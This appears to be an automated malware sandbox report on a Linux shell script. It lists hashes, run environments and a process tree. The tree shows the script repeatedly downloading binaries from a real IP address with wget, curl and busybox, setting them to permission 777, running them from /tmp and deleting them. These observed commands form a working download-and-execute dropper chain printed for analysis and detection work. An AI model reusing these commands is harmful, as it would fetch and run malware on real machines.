Analysis
max time kernel: 46s
max time network: 129s
platform: ubuntu-18.04_amd64
resource: ubuntu1804-amd64-20240611-en
resource tags: arch:amd64, arch:i386, image:ubuntu1804-amd64-20240611-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system
submitted: 24/11/2024, 02:06
Static task: static1
Behavioral task: behavioral1
  Sample: 294d4b067b8e3fcdf52ba7fb6f9bb1f7c66a53ffb00dba6d931ff2351c33c40d.sh
  Resource: ubuntu1804-amd64-20240611-en
Behavioral task: behavioral2
  Sample: 294d4b067b8e3fcdf52ba7fb6f9bb1f7c66a53ffb00dba6d931ff2351c33c40d.sh
  Resource: debian9-armhf-20240611-en
Behavioral task: behavioral3
  Sample: 294d4b067b8e3fcdf52ba7fb6f9bb1f7c66a53ffb00dba6d931ff2351c33c40d.sh
  Resource: debian9-mipsbe-20240729-en
Behavioral task: behavioral4
  Sample: 294d4b067b8e3fcdf52ba7fb6f9bb1f7c66a53ffb00dba6d931ff2351c33c40d.sh
  Resource: debian9-mipsel-20240611-en
General
Target: 294d4b067b8e3fcdf52ba7fb6f9bb1f7c66a53ffb00dba6d931ff2351c33c40d.sh
Size: 10KB
MD5: f9ec55ea475d5bf2658f26f7f7280c34
SHA1: 223f1daef72dbab6429966084f88ef60a26414c0
SHA256: 294d4b067b8e3fcdf52ba7fb6f9bb1f7c66a53ffb00dba6d931ff2351c33c40d
SHA512: 1eed0d4a83f257ce571b39a36402dcb8f57e8472144723dddd8f818dcdc12822d4fa9b2db7082665fd82ad30ab790dd8bafa0c7932ba13c04651e782f53953aa
SSDEEP: 192:EJ/5zEEuzm7PVm+Dgxbw4STnf777PVm+/EEuzufw4STnKjo:y/5v7PVm+DgxMv7PVm+Bo
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/294d4b067b8e3fcdf52ba7fb6f9bb1f7c66a53ffb00dba6d931ff2351c33c40d.sh/tmp/294d4b067b8e3fcdf52ba7fb6f9bb1f7c66a53ffb00dba6d931ff2351c33c40d.sh1⤵PID:1484
-
/bin/rm/bin/rm bins.sh2⤵PID:1485
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ2⤵PID:1486
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ2⤵
- Writes file to tmp directory
PID:1490
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ2⤵PID:1491
-
-
/bin/chmodchmod 777 fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ2⤵
- File and Directory Permissions Modification
PID:1492
-
-
/tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ./fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ2⤵
- Executes dropped EXE
PID:1493
-
-
/bin/rmrm fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ2⤵PID:1494
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT2⤵PID:1495
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT2⤵
- Writes file to tmp directory
PID:1496
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT2⤵PID:1497
-
-
/bin/chmodchmod 777 7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT2⤵
- File and Directory Permissions Modification
PID:1498
-
-
/tmp/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT./7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT2⤵
- Executes dropped EXE
PID:1499
-
-
/bin/rmrm 7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT2⤵PID:1500
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s2⤵PID:1501
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s2⤵
- Writes file to tmp directory
PID:1502
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s2⤵PID:1503
-
-
/bin/chmodchmod 777 3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s2⤵
- File and Directory Permissions Modification
PID:1504
-
-
/tmp/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s./3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s2⤵
- Executes dropped EXE
PID:1505
-
-
/bin/rmrm 3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s2⤵PID:1506
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD42⤵PID:1507
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD42⤵
- Writes file to tmp directory
PID:1508
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD42⤵PID:1509
-
-
/bin/chmodchmod 777 RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD42⤵
- File and Directory Permissions Modification
PID:1510
-
-
/tmp/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4./RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD42⤵
- Executes dropped EXE
PID:1511
-
-
/bin/rmrm RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD42⤵PID:1512
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk2⤵PID:1513
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk2⤵
- Writes file to tmp directory
PID:1514
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk2⤵PID:1515
-
-
/bin/chmodchmod 777 DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk2⤵
- File and Directory Permissions Modification
PID:1516
-
-
/tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk./DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk2⤵
- Executes dropped EXE
PID:1517
-
-
/bin/rmrm DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk2⤵PID:1518
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m2⤵PID:1519
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m2⤵
- Writes file to tmp directory
PID:1520
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m2⤵PID:1521
-
-
/bin/chmodchmod 777 8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m2⤵
- File and Directory Permissions Modification
PID:1522
-
-
/tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m./8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m2⤵
- Executes dropped EXE
PID:1523
-
-
/bin/rmrm 8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m2⤵PID:1524
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q2⤵PID:1525
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q2⤵
- Writes file to tmp directory
PID:1526
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q2⤵PID:1527
-
-
/bin/chmodchmod 777 LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q2⤵
- File and Directory Permissions Modification
PID:1528
-
-
/tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q./LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q2⤵
- Executes dropped EXE
PID:1529
-
-
/bin/rmrm LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q2⤵PID:1530
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM2⤵PID:1531
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM2⤵
- Writes file to tmp directory
PID:1532
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM2⤵PID:1533
-
-
/bin/chmodchmod 777 ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM2⤵
- File and Directory Permissions Modification
PID:1534
-
-
/tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM./ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM2⤵
- Executes dropped EXE
PID:1535
-
-
/bin/rmrm ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM2⤵PID:1536
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z52⤵PID:1537
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z52⤵
- Writes file to tmp directory
PID:1538
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z52⤵PID:1539
-
-
/bin/chmodchmod 777 BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z52⤵
- File and Directory Permissions Modification
PID:1540
-
-
/tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5./BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z52⤵
- Executes dropped EXE
PID:1541
-
-
/bin/rmrm BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z52⤵PID:1542
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv2⤵PID:1543
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv2⤵
- Writes file to tmp directory
PID:1544
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv2⤵PID:1545
-
-
/bin/chmodchmod 777 Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv2⤵
- File and Directory Permissions Modification
PID:1546
-
-
/tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv./Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv2⤵
- Executes dropped EXE
PID:1547
-
-
/bin/rmrm Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv2⤵PID:1548
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj2⤵PID:1549
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj2⤵
- Writes file to tmp directory
PID:1550
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj2⤵PID:1551
-
-
/bin/chmodchmod 777 DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj2⤵
- File and Directory Permissions Modification
PID:1552
-
-
/tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj./DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj2⤵
- Executes dropped EXE
PID:1553
-
-
/bin/rmrm DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj2⤵PID:1554
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI2⤵PID:1555
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI2⤵
- Writes file to tmp directory
PID:1556
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI2⤵PID:1557
-
-
/bin/chmodchmod 777 3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI2⤵
- File and Directory Permissions Modification
PID:1558
-
-
/tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI./3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI2⤵
- Executes dropped EXE
PID:1559
-
-
/bin/rmrm 3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI2⤵PID:1560
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh2⤵PID:1561
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh2⤵
- Writes file to tmp directory
PID:1562
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh2⤵PID:1563
-
-
/bin/chmodchmod 777 6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh2⤵
- File and Directory Permissions Modification
PID:1564
-
-
/tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh./6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh2⤵
- Executes dropped EXE
PID:1565
-
-
/bin/rmrm 6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh2⤵PID:1566
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy2⤵PID:1567
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy2⤵
- Writes file to tmp directory
PID:1568
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy2⤵PID:1569
-
-
/bin/chmodchmod 777 RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy2⤵
- File and Directory Permissions Modification
PID:1570
-
-
/tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy./RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy2⤵
- Executes dropped EXE
PID:1571
-
-
/bin/rmrm RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy2⤵PID:1572
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z52⤵PID:1573
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z52⤵
- Writes file to tmp directory
PID:1574
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z52⤵PID:1575
-
-
/bin/chmodchmod 777 BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z52⤵
- File and Directory Permissions Modification
PID:1576
-
-
/tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5./BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z52⤵
- Executes dropped EXE
PID:1577
-
-
/bin/rmrm BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z52⤵PID:1578
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk2⤵PID:1579
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk2⤵
- Writes file to tmp directory
PID:1580
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk2⤵PID:1581
-
-
/bin/chmodchmod 777 DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk2⤵
- File and Directory Permissions Modification
PID:1582
-
-
/tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk./DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk2⤵
- Executes dropped EXE
PID:1583
-
-
/bin/rmrm DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk2⤵PID:1584
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m2⤵PID:1585
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m2⤵
- Writes file to tmp directory
PID:1588
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m2⤵PID:1589
-
-
/bin/chmodchmod 777 8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m2⤵
- File and Directory Permissions Modification
PID:1590
-
-
/tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m./8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m2⤵
- Executes dropped EXE
PID:1591
-
-
/bin/rmrm 8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m2⤵PID:1592
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q2⤵PID:1593
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q2⤵
- Writes file to tmp directory
PID:1594
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q2⤵PID:1595
-
-
/bin/chmodchmod 777 LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q2⤵
- File and Directory Permissions Modification
PID:1596
-
-
/tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q./LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q2⤵
- Executes dropped EXE
PID:1597
-
-
/bin/rmrm LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q2⤵PID:1598
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM2⤵PID:1599
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM2⤵
- Writes file to tmp directory
PID:1600
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM2⤵PID:1601
-
-
/bin/chmodchmod 777 ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM2⤵
- File and Directory Permissions Modification
PID:1602
-
-
/tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM./ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM2⤵
- Executes dropped EXE
PID:1603
-
-
/bin/rmrm ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM2⤵PID:1604
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv2⤵PID:1605
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv2⤵
- Writes file to tmp directory
PID:1606
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv2⤵PID:1607
-
-
/bin/chmodchmod 777 Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv2⤵
- File and Directory Permissions Modification
PID:1608
-
-
/tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv./Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv2⤵
- Executes dropped EXE
PID:1609
-
-
/bin/rmrm Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv2⤵PID:1610
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy2⤵PID:1611
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy2⤵
- Writes file to tmp directory
PID:1612
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy2⤵PID:1613
-
-
/bin/chmodchmod 777 RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy2⤵
- File and Directory Permissions Modification
PID:1614
-
-
/tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy./RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy2⤵
- Executes dropped EXE
PID:1615
-
-
/bin/rmrm RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy2⤵PID:1616
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj2⤵PID:1617
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj2⤵
- Writes file to tmp directory
PID:1618
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj2⤵PID:1619
-
-
/bin/chmodchmod 777 DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj2⤵
- File and Directory Permissions Modification
PID:1620
-
-
/tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj./DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj2⤵
- Executes dropped EXE
PID:1621
-
-
/bin/rmrm DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj2⤵PID:1622
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI2⤵PID:1623
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI2⤵
- Writes file to tmp directory
PID:1624
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI2⤵PID:1625
-
-
/bin/chmodchmod 777 3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI2⤵
- File and Directory Permissions Modification
PID:1626
-
-
/tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI./3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI2⤵
- Executes dropped EXE
PID:1627
-
-
/bin/rmrm 3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI2⤵PID:1628
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh2⤵PID:1629
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh2⤵
- Writes file to tmp directory
PID:1630
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh2⤵PID:1631
-
-
/bin/chmodchmod 777 6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh2⤵
- File and Directory Permissions Modification
PID:1632
-
-
/tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh./6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh2⤵
- Executes dropped EXE
PID:1633
-
-
/bin/rmrm 6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh2⤵PID:1634
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD42⤵PID:1635
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD42⤵
- Writes file to tmp directory
PID:1636
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD42⤵PID:1637
-
-
/bin/chmodchmod 777 RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD42⤵
- File and Directory Permissions Modification
PID:1638
-
-
/tmp/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4./RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD42⤵
- Executes dropped EXE
PID:1639
-
-
/bin/rmrm RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD42⤵PID:1640
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ2⤵PID:1641
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ2⤵
- Writes file to tmp directory
PID:1642
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ2⤵PID:1643
-
-
/bin/chmodchmod 777 fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ2⤵
- File and Directory Permissions Modification
PID:1644
-
-
/tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ./fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ2⤵
- Executes dropped EXE
PID:1645
-
-
/bin/rmrm fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ2⤵PID:1646
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT2⤵PID:1647
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT2⤵
- Writes file to tmp directory
PID:1648
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT2⤵PID:1649
-
-
/bin/chmodchmod 777 7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT2⤵
- File and Directory Permissions Modification
PID:1650
-
-
/tmp/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT./7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT2⤵
- Executes dropped EXE
PID:1651
-
-
/bin/rmrm 7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT2⤵PID:1652
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s2⤵PID:1653
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s2⤵
- Writes file to tmp directory
PID:1654
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s2⤵PID:1655
-
-
/bin/chmodchmod 777 3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s2⤵
- File and Directory Permissions Modification
PID:1656
-
-
/tmp/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s./3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s2⤵
- Executes dropped EXE
PID:1657
-
-
/bin/rmrm 3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s2⤵PID:1658
-
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 153B
MD5: 998368d7c95ea4293237f2320546e440
SHA1: 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256: 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512: 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97